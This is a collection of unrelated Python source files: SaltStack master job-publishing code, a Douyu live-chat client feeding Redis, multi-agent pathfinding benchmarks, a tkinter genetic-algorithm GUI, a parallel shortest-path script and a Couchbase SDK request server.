clear_load['user'] = self.loadauth.load_name(extra)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions,
'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt'])
}
}
jid = self._prep_jid(clear_load, extra)
if jid is None:
return {'enc': 'clear',
'load': {'error': 'Master failed to assign jid'}}
payload = self._prep_pub(minions, jid, clear_load, extra, missing)
# Send it!
self._send_ssh_pub(payload, ssh_minions=ssh_minions)
self._send_pub(payload)
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions,
'missing': missing
}
}
def _prep_auth_info(self, clear_load):
sensitive_load_keys = []
key = None
if 'token' in clear_load:
auth_type = 'token'
err_name = 'TokenAuthenticationError'
sensitive_load_keys = ['token']
elif 'eauth' in clear_load:
auth_type = 'eauth'
err_name = 'EauthAuthenticationError'
sensitive_load_keys = ['username', 'password']
else:
auth_type = 'user'
err_name = 'UserAuthenticationError'
key = self.key
return auth_type, err_name, key, sensitive_load_keys
def _prep_jid(self, clear_load, extra):
'''
Return a jid for this publication
'''
# the jid in clear_load can be None, '', or something else. this is an
# attempt to clean up the value before passing to plugins
passed_jid = clear_load['jid'] if clear_load.get('jid') else None
nocache = extra.get('nocache', False)
# Retrieve the jid
fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
try:
# Retrieve the jid
jid = self.mminion.returners[fstr](nocache=nocache,
passed_jid=passed_jid)
except (KeyError, TypeError):
# The returner is not present
msg = (
'Failed to allocate a jid. The requested returner \'{0}\' '
'could not be loaded.'.format(fstr.split('.')[0])
)
log.error(msg)
return {'error': msg}
return jid
def _send_pub(self, load):
'''
Take a load and send it across the network to connected minions
'''
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.publish(load)
@property
def ssh_client(self):
if not hasattr(self, '_ssh_client'):
self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts)
return self._ssh_client
def _send_ssh_pub(self, load, ssh_minions=False):
'''
Take a load and send it across the network to ssh minions
'''
if self.opts['enable_ssh_minions'] is True and ssh_minions is True:
log.debug('Send payload to ssh minions')
threading.Thread(target=self.ssh_client.cmd, kwargs=load).start()
def _prep_pub(self, minions, jid, clear_load, extra, missing):
'''
Take a given load and perform the necessary steps
to prepare a publication.
TODO: This is really only bound by temporal cohesion
and thus should be refactored even further.
'''
clear_load['jid'] = jid
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
# TODO Error reporting over the master event bus
self.event.fire_event({'minions': minions}, clear_load['jid'])
new_job_load = {
'jid': clear_load['jid'],
'tgt_type': clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
'missing': missing,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
if self.opts['ext_job_cache']:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
save_load_func = True
# Get the returner's save_load arg_spec.
try:
arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr])
# Check if 'minions' is included in returner's save_load arg_spec.
# This may be missing in custom returners, which we should warn about.
if 'minions' not in arg_spec.args:
log.critical(
'The specified returner used for the external job cache '
'\'%s\' does not have a \'minions\' kwarg in the returner\'s '
'save_load function.', self.opts['ext_job_cache']
)
except (AttributeError, KeyError):
save_load_func = False
log.critical(
'The specified returner used for the external job cache '
'"%s" does not have a save_load function!',
self.opts['ext_job_cache']
)
if save_load_func:
try:
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# always write out to the master job caches
try:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions)
except KeyError:
log.critical(
'The specified returner used for the master job cache '
'"%s" does not have a save_load function!',
self.opts['master_job_cache']
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
# if you specified a master id, lets put that in the load
if 'master_id' in self.opts:
load['master_id'] = self.opts['master_id']
# if someone passed us one, use that
if 'master_id' in extra:
load['master_id'] = extra['master_id']
# Only add the delimiter to the pub data if it is non-default
if delimiter != DEFAULT_TARGET_DELIM:
load['delimiter'] = delimiter
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'kwargs' in clear_load:
if 'ret_config' in clear_load['kwargs']:
load['ret_config'] = clear_load['kwargs'].get('ret_config')
if 'metadata' in clear_load['kwargs']:
load['metadata'] = clear_load['kwargs'].get('metadata')
if 'module_executors' in clear_load['kwargs']:
load['module_executors'] = clear_load['kwargs'].get('module_executors')
if 'executor_opts' in clear_load['kwargs']:
load['executor_opts'] = clear_load['kwargs'].get('executor_opts')
if 'ret_kwargs' in clear_load['kwargs']:
load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs')
if 'user' in clear_load:
log.info(
'User %s Published command %s with jid %s',
clear_load['user'], clear_load['fun'], clear_load['jid']
)
load['user'] = clear_load['user']
else:
log.info(
'Published command %s with jid %s',
clear_load['fun'], clear_load['jid']
)
log.debug('Published command details %s', load)
return load
def ping(self, clear_load):
'''
Send the load back to the sender.
'''
return clear_load
class FloMWorker(MWorker):
'''
Change the run and bind to be ioflo friendly
'''
def __init__(self,
opts,
key,
):
MWorker.__init__(self, opts, key)
def setup(self):
'''
Prepare the needed objects and socket for iteration within ioflo
'''
salt.utils.crypt.appendproctitle(self.__class__.__name__)
self.clear_funcs = salt.master.ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('ZMQ Worker binding to socket %s', self.w_uri)
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
self.socket.connect(self.w_uri)
def handle_request(self):
'''
Handle a single request
'''
try:
polled = self.poller.poll(1)
if polled:
package = self.socket.recv()
self._update_aes()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
self.socket.send(ret)
except KeyboardInterrupt:
raise
except Exception as exc:
# Properly handle EINTR from SIGUSR1
if isinstance(exc, zmq.ZMQError) and exc.errno == errno.EINTR:
return
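# --- Illustrative sketch (added; not part of Salt) ---------------------------
# A minimal, self-contained imitation of the request-routing pattern used
# above: MWorker._handle_payload dispatches on payload['enc'] ('clear' vs
# 'aes'), and the handlers return a (result, instructions) pair where the
# instructions dict (e.g. {'fun': 'send'}) tells the request channel how to
# encrypt and route the reply. All names below are invented for illustration.
def _dispatch_sketch(payload):
    def handle_clear(load):
        # cleartext commands are answered with a 'send_clear' instruction
        return {'echo': load}, {'fun': 'send_clear'}
    def handle_aes(load):
        # encrypted commands are answered with a plain 'send' instruction
        return {'echo': load}, {'fun': 'send'}
    handlers = {'clear': handle_clear, 'aes': handle_aes}
    return handlers[payload['enc']](payload['load'])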
|
danmu_factory.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017/12/7
# @Author : wangmengcn
# @Email : eclipse_sv@163.com
import socket
import re
from time import time, sleep
from datetime import datetime
from threading import Thread
from json import dumps
from . import r
class DouyuDM:
HOST = 'openbarrage.douyutv.com'
PORT = 8601
def __init__(self, room_id):
self.room_id = room_id
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.is_connected = False
self.is_terminated = False
        # Login and keep-alive messages
self.LOGIN_INFO = "type@=loginreq/username@=ABABA/password@=12345678/roomid@={}/".format(room_id)
self.JION_GROUP = "type@=joingroup/rid@={}/gid@=-9999/".format(room_id)
self.KEEP_ALIVE = "type@=keeplive/tick@={}/"
        # Message body parsing: supported message types and their handlers
self.msg_types = ['@=chatmsg', '@=onlinegift', '@=dgb',
'@=uenter', '@=bc_buy_deserve', '@=ssd',
'@=spbc', '@=ggbb']
self.convert_function_map = {
'@=chatmsg': self._convert_chatmsg,
'@=onlinegift': self._convert_onlinegift,
'@=dgb': self._convert_dgb,
'@=uenter': self._convert_uenter,
'@=bc_buy_deserve': self._convert_bc_buy_deserve,
'@=ssd': self._convert_ssd,
'@=spbc': self._convert_spbc,
'@=ggbb': self._convert_ggbb
}
@staticmethod
def transform_msg(content):
        # Convert the message into the target wire format before sending
length = bytearray([len(content) + 9, 0x00, 0x00, 0x00])
code = length
magic = bytearray([0xb1, 0x02, 0x00, 0x00])
end = bytearray([0x00])
trscont = bytes(content.encode('utf-8'))
return bytes(length + code + magic + trscont + end)
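    # Note (added for clarity, not in the original source): the frame built
    # above is laid out as
    #     [4-byte length][the same 4-byte length][b1 02 00 00][UTF-8 payload][0x00]
    # where both length fields alias the same bytearray and the length value
    # is len(content) + 9. Because that value is packed into a single byte
    # (bytearray([len(content) + 9, 0, 0, 0])), this only works for payloads
    # shorter than 247 bytes, which is enough for the login/join/keepalive
    # messages used in this module.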
def connect_to_server(self):
        # Connect to the danmu (bullet-comment) server
try:
self.socket.connect((self.HOST, self.PORT))
except socket.error as e:
print(str(e))
else:
self.is_connected = True
print('connected to danmu server')
def print_danmu(self):
        # Print danmu messages
msgs = self.send_and_get_msg()
for msg in msgs:
self._convert_danmu(msg)
def publish_danmu(self):
        # Broadcast danmu messages by publishing them to a Redis channel
danmu_channel = 'channel:{}'.format(self.room_id)
msgs = self.send_and_get_msg()
for msg in msgs:
danmu_info = dumps(self._convert_danmu(msg))
if danmu_info:
r.publish(danmu_channel, danmu_info)
def terminate(self):
        # Stop fetching danmu
self.is_terminated = True
def send_and_get_msg(self):
        # Receive danmu messages
if self.is_connected:
            # Send the login message and join the specified danmu group
self.socket.sendall(self.transform_msg(self.LOGIN_INFO))
self.socket.sendall(self.transform_msg(self.JION_GROUP))
keep_aliver = self._keep_connect_alive()
next(keep_aliver)
loop_begin = datetime.now()
while not self.is_terminated:
now = time()
sleep(0.1)
                # Refresh the keepalive
running_time = datetime.now()
if (running_time - loop_begin).seconds > 40:
keep_alive_info = self.KEEP_ALIVE.format(now)
keep_alive_info = self.transform_msg(keep_alive_info)
self.is_terminated = keep_aliver.send(keep_alive_info)
loop_begin = datetime.now()
try:
danmu_msg = self.socket.recv(1000)
except socket.error as e:
print(str(e))
else:
yield danmu_msg
def _keep_connect_alive(self):
        # Keep the socket connection alive
while self.is_connected:
keep_alive_info = yield False
if keep_alive_info:
try:
self.socket.sendall(keep_alive_info)
except socket.error as e:
print('error in keepalive:' + str(e))
print('*' * 10 + 'keepalive' + '*' * 10)
sleep(1)
def _convert_danmu(self, danmu_msg):
        # Dispatch the message to the matching parser based on its type
for flag in self.msg_types:
if flag in danmu_msg:
return self.convert_function_map.get(flag)(danmu_msg)
def _convert_chatmsg(self, chat_msg):
        # Parse a regular chat message
chat_dict = dict()
user_name = re.search("\/nn@=(.+?)\/", chat_msg)
if user_name:
chat_dict.setdefault('username', user_name.group(1))
chat_content = re.search("\/txt@=(.+?)\/", chat_msg)
if chat_content:
chat_dict.setdefault('chatcontent', chat_content.group(1))
user_level = re.search("\/level@=(.+?)\/", chat_msg)
if user_level:
chat_dict.setdefault('userlevel', user_level.group(1))
chat_date = datetime.now()
chat_dict.setdefault('date', chat_date.isoformat(' '))
for k, v in chat_dict.items():
print('{} >>> {}:{}'.format(self.room_id, k, v))
return chat_dict
def _convert_onlinegift(self, onlinegift):
        # Parse an online gift message
onlinegift_dict = dict()
username = re.search("\/nn@=(.+?)\/", onlinegift)
if username:
onlinegift_dict.setdefault('username', username.group(1))
sil = re.search("\/sil@=(.+?)\/", onlinegift)
if sil:
onlinegift_dict.setdefault('sil', sil.group(1))
        print('{} >>user:{} 获得鱼丸{}个'.format(self.room_id, onlinegift_dict.get('username', None), onlinegift_dict.get('sil', None)))
return onlinegift_dict
def _convert_dgb(self, dgb):
        # Parse a gift-giving message
dgb_dict = dict()
username = re.search("\/nn@=(.+?)\/", dgb)
if username:
dgb_dict.setdefault('username', username.group(1))
hits = re.search("\/hits@=(.+?)\/", dgb)
if hits:
dgb_dict.setdefault('hits', hits.group(1))
gift_type = re.search("\/gs@=(.+?)\/", dgb)
if gift_type:
dgb_dict.setdefault('gift_type', gift_type.group(1))
print('{} >>> {}送出{}{}连击'.format(self.room_id, dgb_dict.get('username', None),
dgb_dict.get('gift_type', None),
dgb_dict.get('hits', None)))
return dgb_dict
def _convert_uenter(self, uenter):
        # Parse a user-entered-the-room message
uenter_dict = dict()
username = re.search("\/nn@=(.+?)\/", uenter)
if username:
uenter_dict.setdefault('username', username.group(1))
print('{} >>>欢迎:{} 进入直播间'.format(self.room_id, uenter_dict.setdefault('username', None)))
return uenter_dict
def _convert_bc_buy_deserve(self, bc_buy_deserve):
        # Parse a 'deserve' (bc_buy_deserve) purchase message
return None
def _convert_ssd(self, ssd):
        # Parse a super danmu message
return None
def _convert_spbc(self, spbc):
        # Parse a room-wide gift broadcast message
spbc_dict = dict()
sender_name = re.search("\/sn@=(.+?)\/", spbc)
if sender_name:
spbc_dict.setdefault('sender_name', sender_name.group(1))
reciver_name = re.search("\/dn@=(.+?)\/", spbc)
if reciver_name:
spbc_dict.setdefault('reciver_name', reciver_name.group(1))
gift_num = re.search("\/gc@=(.+?)\/", spbc)
if gift_num:
spbc_dict.setdefault('gift_num', gift_num.group(1))
gift_name = re.search("\/gn@=(.+?)\/", spbc)
if gift_name:
spbc_dict.setdefault('gift_name', gift_name.group(1))
print('{} >>> {}赠送给{} {}个{}'.format(self.room_id, spbc_dict.get('sender_name', None),
spbc_dict.get('reciver_name', None),
spbc_dict.get('gift_num', None),
spbc_dict.get('gift_name', None)))
return spbc_dict
def _convert_ggbb(self, ggbb):
        # Parse a red-packet grab message
ggbb_dict = dict()
username = re.search("\/dnk@=(.+?)\/", ggbb)
if username:
ggbb_dict.setdefault('username', username.group(1))
sender_name = re.search("\/snk@=(.+?)\/", ggbb)
if sender_name:
ggbb_dict.setdefault('sender_name', sender_name.group(1))
gift_num = re.search("\/sl@=(.+?)\/", ggbb)
if gift_num:
ggbb_dict.setdefault('gift_num', gift_num.group(1))
gift_type = re.search("\/rpt@=(.+?)\/", ggbb)
if gift_type:
ggbb_dict.setdefault('gift_type', gift_type.group(1))
print('{} >>> {} 获得了来自{}的{}个{}'.format(self.room_id, ggbb_dict.get('username', None),
ggbb_dict.get('sender_name', None),
ggbb_dict.get('gift_num', None),
ggbb_dict.get('gift_type', None)))
return ggbb_dict
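# Illustrative sketch (added; not part of the original module): feed a
# hypothetical chat message in Douyu's key@=value/ (STT) format through
# _convert_chatmsg to show which fields the regexes above extract. The sample
# string is invented for demonstration purposes only.
def _example_parse_chatmsg():
    sample = 'type@=chatmsg/rid@=67373/nn@=some_user/txt@=hello/level@=12/'
    return DouyuDM('67373')._convert_chatmsg(sample)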
if __name__ == '__main__':
rooms = ['67373', '71017']
danmu_client = []
for room in rooms:
danmu = DouyuDM(room)
danmu_client.append(danmu)
danmu.connect_to_server()
danmu_thread = Thread(target=danmu.print_danmu)
danmu_thread.start()
|
testing.py
|
import math
import multiprocessing
import os
import time
from src.a_star import A_star
from src.cbs import CBS
from src.cbs_ds import CBS_DS
from src.cbs_h import CBS_H
from src.cbs_pc import CBS_PC
from src.map import Map
from test.movingai import read_map_from_moving_ai_file, read_tasks_from_moving_ai_file
from os import path
from random import sample, seed
from src.visualization import draw
def A_star_test(path):
i_start = 1
j_start = 1
i_goal = 13
j_goal = 28
width, height, cell = read_map_from_moving_ai_file(path)
task_map = Map()
task_map.set_grid_cells(width, height, cell)
print(A_star(task_map, i_start, j_start, i_goal, j_goal, []))
print(A_star(task_map, i_start, j_start, i_goal, j_goal, [((2, 1), 1)]))
print(A_star(task_map, i_start, j_start, i_goal, j_goal, [((1, 1), 0)]))
def CBS_test(task_map, agents, status, target_class=CBS):
cbs = target_class(task_map, agents)
sol, cost, nodes_cnt = cbs.find_best_solutions()
print(f"{target_class.__name__}: cost = {str(cost)}, nodes = {str(nodes_cnt)}")
# draw(task_map, sol, agents)
if cost < math.inf:
status.append(cost)
status.append(nodes_cnt)
status.append("Found!")
else:
status.append("Not found!")
def big_test(scenario_path,
min_agents,
max_agents,
step=5,
sample_times=20,
experiment_time=6000*5,
target_class=CBS):
seed(1337)
agents, map_file = read_tasks_from_moving_ai_file(scenario_path)
width, height, cell = read_map_from_moving_ai_file(path.join(os.path.dirname(os.path.dirname(__file__)), 'data', 'maps', map_file))
task_map = Map()
task_map.set_grid_cells(width, height, cell)
manager = multiprocessing.Manager()
cur_time = time.time()
successes_ratios = []
nodes = []
times = []
for agents_n in range(min_agents, max_agents + 1, step):
successes = 0
nodes += [[]]
times += [[]]
for i in range(sample_times):
start_time = time.time()
print(f"Starting experiment number {i + 1} / {sample_times} on {agents_n} agents")
cur_agents = sample(agents, k=agents_n)
res = manager.list()
p = multiprocessing.Process(target=CBS_test, args=(task_map, cur_agents, res, target_class))
p.start()
p.join(experiment_time)
if p.is_alive():
print("Time limit exceeded, finishing")
p.terminate()
if len(res) == 3 and res[2] == 'Found!':
successes += 1
nodes[-1] += [res[1]]
times[-1] += [time.time() - start_time]
successes_ratios += [successes / sample_times]
print(f'{successes} out of {sample_times} successes on {agents_n} agents')
spended_time = time.time() - cur_time
print(f'Time spent: {spended_time}')
return successes_ratios, spended_time, nodes, times
# big_test('../data/scenarios/den520d/den520d-even-1.scen', 6, 6, sample_times=1)
# big_test('../data/scenarios/empty_8_8/empty-8-8-even-25.scen', 5, 5, 1, 1)
# big_test('../data/scenarios/towards.scen', 2, 2, 1, 1, target_function=CBS_PC_test)
# big_test('../data/scenarios/mice.scen', 2, 2, 1, 1, target_function=CBS_PC_test)
# big_test('../data/scenarios/empty_8_8/empty-8-8-even-25.scen', 10, 10, 1, 1)
# big_test('../data/scenarios/empty_8_8/empty-8-8-even-25.scen', 10, 10, 1, 1, target_class=CBS_PC)
# big_test('../data/scenarios/empty_8_8/empty-8-8-even-25.scen', 10, 10, 1, 1, target_class=CBS_DS)
# big_test('../data/scenarios/empty_8_8/empty-8-8-even-25.scen', 10, 10, 1, 1, target_class=CBS_H)
# big_test('../data/scenarios/den520d/den520d-even-1.scen', 6, 6, sample_times=1, target_class=CBS_PC)
# big_test('../data/scenarios/den520d/den520d-even-1.scen', 10, 10, sample_times=1, target_class=CBS_DS)
# big_test('../data/scenarios/den520d/den520d-even-1.scen', 6, 6, step=1, sample_times=1, target_class=CBS_H, experiment_time=300)
# big_test('../data/scenarios/ost003d/ost003d-even-25.scen', 5, 10, step=1, sample_times=2, target_class=CBS_H, experiment_time=300)
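# Illustrative usage (added; not part of the original experiments): run one
# small experiment and print the aggregate metrics that big_test returns. The
# scenario path is taken from the commented examples above and is assumed to
# exist locally.
if __name__ == '__main__':
    ratios, total_time, node_counts, run_times = big_test(
        '../data/scenarios/empty_8_8/empty-8-8-even-25.scen',
        min_agents=5, max_agents=5, step=1, sample_times=1)
    print(f'success ratios: {ratios}')
    print(f'total time spent: {total_time:.2f} seconds')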
|
MainFrame.py
|
"""
This class contains all functions to manage different windows
The baseline for this code is from Sentdex (see the link below)
https://pythonprogramming.net/object-oriented-programming-crash-course-tkinter/
"""
import random as r
from itertools import cycle
import tkinter as tk
import EvolutionManager
import Population
import multiprocessing as mp
import time
import threading as t
import RandomMapGenerator as rmg
import CanvasFrame
import sys
import StartFrame
#-------------------------------------------------------------------------------------
class MainFrame(tk.Tk):
""" This is main class for managing different views(windows) """
def onClossing(self):
self.manager.stopMainLoop()
self.destroy()
sys.exit()
#-------------------------------------------------------------------------------------
def setEvent(self,event):
self.event = event
#-------------------------------------------------------------------------------------
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
# init main frame
self.container = tk.Frame(self)
self.container.pack(side="top", fill="both", expand = True)
# self.container.grid(row = 0, column = 0, sticky = "nswe")
self.frames = {}
# init frame add to dict
frame = CanvasFrame.CanvasFrame(self.container, self)
self.frames[CanvasFrame] = frame
frame.grid(row = 0, column = 0, sticky = "nswe")
# init frame add to dict
frame = StartFrame.StartFrame(self.container, self)
self.frames[StartFrame] = frame
frame.grid(row = 0, column = 0, sticky = "nswe")
# add close window event handler
self.protocol("WM_DELETE_WINDOW", self.onClossing)
# load canvas
self.show_frame(CanvasFrame)
#-------------------------------------------------------------------------------------
def show_frame(self, cont):
""" makes choosen frame visibale at top"""
# get window
frame = self.frames[cont]
self.topFrame = frame
# make window in front
# .lift() should also works
# self.attributes("-topmost", True)
frame.tkraise()
        # set grid position
print("Show Frame")
#-------------------------------------------------------------------------------------
def getCurrentTopFrame(self):
""" returns top frame object"""
return self.topFrame
#-------------------------------------------------------------------------------------
def setForClossingEvent(self, manager):
""" sets thread variable for future stoping when app is being closed"""
self.manager = manager
#------------------------------------------------------------------------------------- \
def genethicAlgorithmPart(self):
"""begin training sequence"""
self.manager.startTraining()
#-------------------------------------------------------------------------------------
def addChangerListiner(self):
""" makes a new thread in widget process to monitor changes to be displayed"""
thread = t.Thread(target = self.changeListiner)
thread.start()
#-------------------------------------------------------------------------------------
def changeListiner(self):
""" contains logic for cheking for changes and updatting them"""
lastBest = None
best = None
print("Starting listiner thread")
while True:
#wait for info about event
self.event.wait()
            # get the new candidate best and keep the old one for later comparison
lastBest, best = best,self.manager.population.bestSalesman
if lastBest is not best:
# if new one is really better then update the drawing on canvas
self.getCurrentTopFrame().updateFrame(best.dna.getAsListOfTuple())
# clear event so it could be set again
self.event.clear()
#-------------------------------------------------------------------------------------
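#-------------------------------------------------------------------------------------
# Illustrative, self-contained sketch (added; not part of this GUI) of the
# threading.Event handshake used by changeListiner above: a producer thread
# sets the event whenever a new result is available, while the listener waits
# on it, clears it and then consumes everything that has arrived.
def _event_handshake_demo(rounds = 3):
    import queue
    event = t.Event()
    updates = queue.Queue()
    def producer():
        for i in range(rounds):
            updates.put(i)
            event.set()
    worker = t.Thread(target = producer)
    worker.start()
    seen = []
    while len(seen) < rounds:
        event.wait()
        # clear before draining so a set() that races with the drain is not lost
        event.clear()
        while not updates.empty():
            seen.append(updates.get())
    worker.join()
    return seen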
|
dijk_range_mp.py
|
import random
import time
import sys
import multiprocessing
from multiprocessing import Lock,Process,Semaphore,Barrier,Array,Queue
INT_MAX = multiprocessing.Value('i',1000000000)
#N=multiprocessing.Value('i',16384)
#DEG=multiprocessing.Value('i',16)
#P=multiprocessing.Value('i',1)
q = multiprocessing.Queue()
N1=int(sys.argv[2])
DEG1=int(sys.argv[3])
P1=int(sys.argv[1])
W = [[0 for x in range(DEG1)] for x in range(N1)]
W_index = [[0 for x in range(DEG1)] for x in range(N1)]
u = multiprocessing.Array('i',range(P1))
D = multiprocessing.Array('i',range(N1))
Q = multiprocessing.Array('i',range(N1))
range_1 = multiprocessing.Array('i',range(P1))
terminate = multiprocessing.Array('i',range(P1))
lock = multiprocessing.Lock()
l = [multiprocessing.Lock() for i in range(0,N1)]
INT_MAX1=1000000000
barrier = Barrier(P1)
local_min = multiprocessing.Array('i',range(P1))
def graph():
global W
global W_index
global P
global INT_MAX
global D
global Q
global u
global local_min
global l
for i in range(0,N1):
for j in range(0,DEG1):
W_index[i][j] = i+j
W[i][j] = i+j#random.randint(1,3)+i
if W_index[i][j] >= N1-1 :
W_index[i][j] = N1-1
#W[i][j] = N-1 random.randint(1, 10) + i
if i==i+j:
W[i][j]=0
#print (W[i][j], W_index[i][j])
#print (' ')
def array_init():
for i in range(0,N1):
D[i] = INT_MAX1
Q[i] = 1
D[0] = 0
def do_work(tid,D,Q,N,DEG,P,u, l,lock, terminate,range_1):
start_time = time.time()
local_count=N.value
N=N.value
DEG=DEG.value
P=P.value
INT_MAX2=INT_MAX.value
u[tid]=0
uu=0
i_start = tid*DEG/P
i_stop = (tid+1)*DEG/P
barrier.wait()
while terminate[0]==0: #outer loop
while u[0]<range_1[0]:
for i in range(0,DEG):
l[W_index[uu][i]].acquire()
if(D[W_index[uu][i]] > D[uu] + W[uu][i]):
D[W_index[uu][i]] = D[uu] + W[uu][i] #relax
l[W_index[uu][i]].release()
lock.acquire()
if u[0]<range_1[0]:
u[0] = u[0] + 1
uu = u[0]
if u[0] >= N-1:
terminate[0] = 1
lock.release()
if tid==0:
range_1[0] = range_1[0]*DEG
if range_1[0] >= N:
range_1[0] = N
barrier.wait()
final_time = time.time() - start_time
print ('TID:',tid,'TIME_SEC',final_time)
strr0 = "range/range"
strr1 = str(P)
strr11 = str(N)
strr12 = str(DEG)
strr2 = ".out"
strr3 = "-"
strr_final = strr0 + strr3 + strr1 + strr3 + strr11 + strr3 + strr12 + strr2
f = open(strr_final,'w')
f.write(str(final_time))
    f.close()
#if tid==0:
# for i in range(0,N):
# print (D[i],Q[i])
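# Note (added for clarity, not in the original code): do_work implements a
# range-limited parallel relaxation. All workers share the frontier counter
# u[0]; each worker claims the next vertex under `lock`, relaxes its DEG
# outgoing edges while holding the per-target-vertex locks in `l`, and worker
# 0 multiplies range_1[0] by DEG after every barrier so the window of
# processed vertices grows until it covers all N nodes, at which point
# terminate[0] is set and every process writes its timing to a range/*.out
# file.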
def main():
graph()
array_init()
P11 = int(sys.argv[1])
N11 = int(sys.argv[2])
DEG11 = int(sys.argv[3])
print(P11)
P1 = P11
N1 = N11
DEG1 = DEG11
P = multiprocessing.Value('i',P11)
N = multiprocessing.Value('i',N11)
DEG = multiprocessing.Value('i',DEG11)
range_1[0] = 1
terminate[0] = 0
    procs = []
    for i in range(1,P1):
        p = Process(target=do_work,args=(i,D,Q,N,DEG,P,u, l,lock, terminate,range_1))
        p.start()
        procs.append(p)
    do_work(0,D,Q,N,DEG,P,u, l,lock, terminate,range_1)
    for p in procs:
        p.join()
if __name__ == "__main__":
main()
|
sdkserver.py
|
import eventlet
import json
import random
import string
import json
import sys
import time
from couchbase.couchbaseclient import CouchbaseClient
from multiprocessing import Process
import testcfg as cfg
pool = eventlet.GreenPool(1000000)
processMap = {}
class SysCouchClient(CouchbaseClient):
def __init__(self, url, bucket, cred, accport):
self.pending_get_msgs = 0
self.bucket = bucket
self.url = url
self.cred = cred
self.ready = True
self.accport = accport
try:
super(SysCouchClient, self).__init__(url, bucket, cred)
print "sdk_%s: connected to %s => %s" % (accport, url, bucket)
except Exception as ex:
print "sdk_%s: unable to establish connection to %s => %s, %s " %\
(accport, url, bucket, ex)
self.ready = False
def incr_pending_get_msgs(self, val):
self.pending_get_msgs = \
self.pending_get_msgs + val
class CouchClientManager():
def __init__(self, accport):
self.client_map = {}
self.accport = accport
def add_bucket_client(self, bucket = "default",
password = "",
ip = cfg.COUCHBASE_IP,
port = cfg.COUCHBASE_PORT):
url = "http://%s:%s/pools/default" % (ip, port)
client = SysCouchClient(url, bucket, password, self.accport)
if client.ready == True:
self.client_map[bucket] = client
def get_bucket_client(self, bucket,
password = "",
ip = cfg.COUCHBASE_IP,
port = cfg.COUCHBASE_PORT):
if bucket not in self.client_map:
self.add_bucket_client(bucket, password, ip, port)
return self.client_map[bucket]
def requestHandler(self, client_sock):
c = ''
respond = False
while True:
_recv = client_sock.recv(1024)
if not _recv:
break
if _recv == '\0':
respond = True
break
else:
c = c + _recv
rc = self._requestHandler(c)
if respond:
self.sendClientResponse(client_sock, rc)
client_sock.close()
def sendClientResponse(self, client_sock, rc):
msg = ""
if rc is not None:
try:
msg = json.dumps(rc)
except Exception:
pass
client_sock.send(msg)
def _requestHandler(self, c, retries = 0):
try:
data = json.loads(c)
self.client_from_req(data)
res = self.exec_request(data)
return res
except ValueError as ex:
print ex
print "unable to decode json: %s" % c
except Exception as ex:
processMap[self.accport]["connected"] = False
print "Error: %s" % ex
def exec_request(self, data):
if data['command'] == 'set':
return self.do_set(data)
if data['command'] == 'setq':
return self.do_setq(data)
if data['command'] == 'mset':
return self.do_mset(data)
if data['command'] == 'mdelete':
return self.do_mdelete(data)
if data['command'] == 'get':
return self.do_get(data)
if data['command'] == 'mget':
return self.do_mget(data)
if data['command'] == 'delete':
return self.do_delete(data)
if data['command'] == 'query':
return self.do_query(data)
if data['command'] == 'latency':
return self.get_op_latency(data)
def do_mset(self, data):
keys = data['args']
template = data['template']
kv = template['kv']
ttl = 0
flags = 0
if "ttl" in template:
ttl = int(template['ttl'])
if "flags" in template:
flags = template['flags']
client = self.client_from_req(data)
for key in keys:
doc = {"args" : [key, ttl, flags, kv]}
try:
self.do_setq(doc, client)
except Exception as ex:
raise Exception(ex)
rc = client.recv_bulk_responses()
if len(rc) > 0:
for msg in rc:
if isinstance(msg, dict) and 'error' in msg and int(msg["error"]) != 0:
if int(msg["error"]) == 7:
client.reconfig_vbucket_map(forward=True)
if int(msg["error"]) == 134:
pass # temp failure (oom) ignore
else:
ts = time.localtime()
ts_string = "%s/%s/%s %s:%s:%s" %\
(ts.tm_year, ts.tm_mon, ts.tm_mday, ts.tm_hour, ts.tm_min, ts.tm_sec)
print "%s:set MemcachedError%d: %s" % (ts_string, msg["error"], msg["rv"])
return True
